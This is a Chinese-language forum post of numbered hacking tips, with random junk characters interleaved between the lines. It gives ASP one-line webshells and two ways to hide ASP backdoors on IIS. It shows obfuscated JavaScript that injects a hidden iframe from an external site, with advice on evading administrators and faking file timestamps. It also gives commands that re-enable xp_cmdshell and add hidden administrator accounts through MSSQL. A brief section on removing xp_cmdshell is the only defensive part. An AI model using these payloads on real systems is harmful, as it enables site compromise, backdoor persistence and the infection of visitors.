" h: Z E* O J& C. H+ V& w0 r
d).<script language=VBScript runat=server>execute request("sb")</Script>
/ t, P" v: c/ O0 G- @1 e3 s* J( \8 U
e).<%25Execute(request("l"))%25>
# ], s9 G0 v) F2 D" K5 }: o* S
f).<%if request("cmd")<>"" then execute request("pass")%>
# j) U; y! H% g, D* ? w. m3 r
/ {5 S4 b M) r) \: N
52、at "12:17" /interactive cmd
2 H( l! ]; B$ Y J: @5 E
执行后可以用AT命令查看新加的任务
3 w" x, l( q3 s& x+ O$ A. U1 C$ G
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
7 R/ w/ [3 u5 [( n, K9 U
' A% l- f# \$ x- o0 Q
53、隐藏ASP后门的两种方法
7 }% h4 F5 x* b: }
1、建立非标准目录:mkdir images..\
( l" b) _5 l$ T
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
- K) H! d' Q& v* v& ?0 D6 M& |
通过web访问ASP木马:http://ip/images../news.asp?action=login
( \! H. l1 s( c* u3 U
如何删除非标准目录:rmdir images..\ /s
5 i0 {- a' f0 m7 I" c
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
% z8 f# C9 ~0 ?( B3 A' N4 z! u4 `; P
mkdir programme.asp
$ r- W5 M6 S. Q# s
新建1.txt文件内容:<!--#include file=”12.jpg”-->
& u2 {+ [1 s, h/ F! p, H( V0 y# K
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
+ E0 N' T. H/ y ^; T1 m( @
attrib +H +S programme.asp
* n( S0 u0 P, Y6 k
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
- ]- ^) E9 J" N+ P2 {% m3 }5 ^4 K
, p. D1 p6 d# E8 I/ ~: K
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
' _5 A4 c7 A+ s; ]3 |0 ?
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
/ q- c! R/ P- y. o( `
?" k. d$ j7 o4 l3 j9 b' N+ a
55、JS隐蔽挂马
' A* B! R, Q+ v K
1.
( y; z; a: _& ] ]" O! [- _+ g
var tr4c3="<iframe src=ht";
& W" J2 W$ [( w" @
tr4c3 = tr4c3+"tp:/";
F8 g; ]1 B6 R' H
tr4c3 = tr4c3+"/ww";
0 z* y6 R8 R7 S- U; `$ y
tr4c3 = tr4c3+"w.tr4";
: U9 W7 \2 U5 \1 _3 X1 R
tr4c3 = tr4c3+"c3.com/inc/m";
) X4 m- Q/ O: V2 l' a& E( R
tr4c3 = tr4c3+"m.htm style="display:none"></i";
9 r2 Z. }1 L" Q9 \& o0 z, v
tr4c3 =tr4c3+"frame>'";
- N1 w" ?- d7 a+ R1 d! ^# V
document.write(tr4c3);
4 w3 ~) n* |7 o5 `) d* B) M
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
. s9 C) Z; r x; H$ k1 H
' C* Z8 [& V% D2 k! q: h+ I" I( o
2.
& t- `- T. ?9 p
转换进制,然后用EVAL执行。如
( R6 p; ~0 i4 o
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
( I0 T: i2 r7 p6 d
不过这个有点显眼。
' m7 s# I! D4 C3 B* @+ Z* d
3.
5 e7 l( y6 Q" \ B/ b
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
$ O, Z6 f6 _) v* V+ f
最后一点,别忘了把文件的时间也修改下。
' \4 g$ I/ E0 T2 y
! H9 L: q/ Y' X' b
56.3389终端入侵常用DOS命令
+ ?; z1 M E. {: O8 Z
taskkill taskkill /PID 1248 /t
1 k4 J& A0 M# P5 F( \4 N$ g4 [
. E% D" K/ Q1 o% \4 V' @4 }& N
tasklist 查进程
2 w; Q7 i3 V7 `3 Z* ]
, _0 d; d+ y& C1 @
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
3 p# R: h* H* f& @: O
iisreset /reboot
- a& i/ W- d/ L7 q! N0 s
tsshutdn /reboot /delay:1 重起服务器
4 N6 n: y5 v( y* C) t/ x
1 g# W w& E: {/ c) r+ ^3 i
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
2 {# E, C2 }6 t f2 h
9 X; o3 H+ E, H# S0 i: D2 B
query user 查看当前终端用户在线情况
9 o! ~/ R# h& T, T4 |& B$ I7 E( A
- b$ ^* l: M7 m |/ I* K" Q
要显示有关所有会话使用的进程的信息,请键入:query process *
3 _" W9 S( H" I x1 h; g
. B- w# \5 i. A9 l6 t, h5 P5 a& M F- W
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
l( U" L, W, ~1 A) h! I' E( }
- t7 t/ K# z7 X$ h. M2 {
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
3 P8 K& g7 h) n9 X
5 k+ j" v3 x; T& J
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
. ]; h& v" r' m& P6 a! ^
\* l Q8 G5 w
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
* H3 y0 V0 t4 t3 W5 x
6 G3 z1 O7 @: \. @- @! _/ Z5 I
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
: u2 a; a6 |; B: k- o5 j9 [% z% B
8 P; L% q! n/ B
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
6 P# ]$ R4 @1 O, o1 L( A! F) \) n
% A" r1 y8 Y/ L2 f* y. A
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
" n, C( C% B% o
! b0 M d9 f3 ?" L
56、在地址栏或按Ctrl+O,输入:
' q0 x0 P. @8 e6 p- u
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
5 E( A: J" @' g3 j0 R$ g. C* r; ], U
! M4 @% ?3 F- J1 g+ m
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
! [, \0 Q5 e8 w/ o6 h$ H1 @
- c- Y: _+ O' c9 P! A- c* h
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
2 z. h2 H- f; V
用net localgroup administrators是可以看到管理组下,加了$的用户的。
% M" p) I% i! K0 V& {+ @
# n; E% J% @7 d( }6 P0 [6 \
58、 sa弱口令相关命令
' p: r4 n5 s/ `1 J( u! O
6 F* E% t+ K* |" s8 @
一.更改sa口令方法:
. d' Z) }4 ~' D4 ^
用sql综合利用工具连接后,执行命令:
: L) R, U ?2 F% E t( X0 H
exec sp_password NULL,'20001001','sa'
# A9 @6 O) G5 P# m k# V. h: D4 p
(提示:慎用!)
1 K Q' F. a9 c4 p B' V
6 b8 y) a% G( [! p# c' z
二.简单修补sa弱口令.
+ P7 W R4 k3 C6 r
7 ]2 {2 ?) b! I4 u- q! C; ]
方法1:查询分离器连接后执行:
! ]. k1 L) ]% C
if exists (select * from
# y- z; ~: u) {8 e
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
: t& o6 I' I4 T$ ^6 B
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
6 G; f% P1 `2 F$ R
9 [) w7 F" D/ I: f/ k* u
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
" I0 z' g2 L4 w8 T6 v c# w- Y5 r
+ _$ T T3 k7 l) I: ~5 @; i% [
GO
, x. L' D( V D- j
9 y" U+ m$ G4 X" S4 r0 n# a2 d
然后按F5键命令执行完毕
+ S2 E1 R2 x! p8 I0 Q u1 t
& M' g! H V ~4 t0 m
方法2:查询分离器连接后
. l @! Y# p1 f
第一步执行:use master
% x$ F9 p! I' r: [% B4 b) h/ C
第二步执行:sp_dropextendedproc 'xp_cmdshell'
) s# r7 O& X( v! X6 i
然后按F5键命令执行完毕
$ I/ ?% k% A( h4 [
- i4 O4 u1 s+ \ f
% B+ C6 \4 F; l( k% K$ ~0 q
三.常见情况恢复执行xp_cmdshell.
/ J7 p* @+ o. R' i# I
9 ~7 K- J0 T$ r/ P& k; b) `6 u
. z- \8 Q; Z; F+ ?, @2 n# C
1 未能找到存储过程'master..xpcmdshell'.
$ `( Y' ^. H* M4 s! T
恢复方法:查询分离器连接后,
, S, r; V d, G' _8 r
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
2 O. E2 J% y9 Q3 C" S
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
E- z# W8 n. e% y& t. S: T0 j
然后按F5键命令执行完毕
7 X# |7 Q" u; J6 y1 x1 K+ X9 I, P4 V
# q6 m( v8 W4 W1 \/ B
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
- Q! u5 s5 z+ |" S% o9 M: t
恢复方法:查询分离器连接后,
2 N9 ^' [+ e9 t2 F
第一步执行:sp_dropextendedproc "xp_cmdshell"
5 F+ O$ @0 D ^% W+ P2 u V
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
! R! k8 A# |/ A8 U$ o
然后按F5键命令执行完毕
% n; N3 { `& S* Y: g
9 `+ Q2 e+ ?) _" d3 s8 {
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
+ F" o$ G/ T, y5 w9 h: O
恢复方法:查询分离器连接后,
3 |+ b& L# S* M0 \6 o
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
3 L. q- \- a0 L# {4 Z; G
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
( h. w) B' c7 S& V' j3 D) D# z
然后按F5键命令执行完毕
3 f# |! |' C7 M& m8 e7 k
9 i: ]' \6 M9 e3 o! @9 I
四.终极方法.
9 o, k0 e) Y2 q/ }
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
4 n0 @* r9 w7 |0 z) {9 f
查询分离器连接后,
' f4 r8 Q$ i! v6 Z* b; b
2000servser系统:
# E$ g$ N) j3 H. N+ T: H
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
" ?: P/ @- m+ a2 x' a. \
3 y" f4 c/ J$ m9 [+ X
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
. v5 q. T8 b e$ x
9 ?$ p; _7 J8 e4 u# O
xp或2003server系统:
0 z# N2 [3 h2 }$ b, p5 u4 D6 a
+ }8 Z# b6 k# G: [& V4 N5 C+ r6 N
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
, [! ?2 l6 q/ ^3 p3 F8 Q0 m6 }
7 a9 [7 l2 l! m$ o. _
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
/ F( ?! ~6 k k0 l/ \- l* t
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2